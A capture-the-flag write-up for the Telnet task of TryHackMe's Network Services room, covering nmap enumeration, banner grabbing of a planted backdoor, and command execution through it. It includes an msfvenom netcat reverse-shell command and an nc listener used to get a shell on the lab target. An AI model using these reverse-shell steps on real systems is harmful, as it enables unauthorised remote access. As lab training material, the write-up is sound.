Network Services (Telnet) — Tryhackme

This is a writeup for Network Services room on THM

Enumerating Telnet

Spin up your target machine and let’s do a quick nmap scan to see what ports are open

#nmap -Pn -p- 10.10.37.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
8012/tcp open  unknown

1. How many ports are open on the target machine?

1

2. What port is this?

8012

3. This port is unassigned, but still lists the protocol it’s using, what protocol is this?

TCP

Rerunning the nmap scan without -p-

sudo nmap -Pn 10.10.37.92    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
All 1000 scanned ports on 10.10.37.92 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds

4. Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

0

Telnet Banner Grabbing

If we try to connect to the IP and port the service will print the banner

sudo telnet 10.10.37.92 8012                
[sudo] password for kali: 
Trying 10.10.37.92...
Connected to 10.10.37.92.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands

5. Based on the title returned to us, what do we think this port could be used for?

a backdoor

6. Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy

Exploiting Telnet

Read the room notes from task 7 👀

2. Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY'S BACKDOOR.

3.Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

• sudo tcpdump ip proto \\icmp -i tun0

If using the AttackBox, use:

• sudo tcpdump ip proto \\icmp -i eth0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

TCP DUMP

4. Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Y

We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”

-p = payload

lhost = our local host IP address (this is your machine’s IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format

What word does the generated payload start with?

5. What word does the generated payload start with?

mkfifo

6.
Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvp [listening port]”

What would the command look like for the listening port we selected in our payload?

nc -lvp 4444

Now copy paste the payload generated by the msfvenom in the telnet session

.RUN <payload>

And it will give you a reverse shell

Cat flag.txt to answer the last question

Thank you for reading.

🐾Writeup on Network Services FTP here https://richardphilipsroy.medium.com/network-services-ftp-tryhackme-6c22406d1444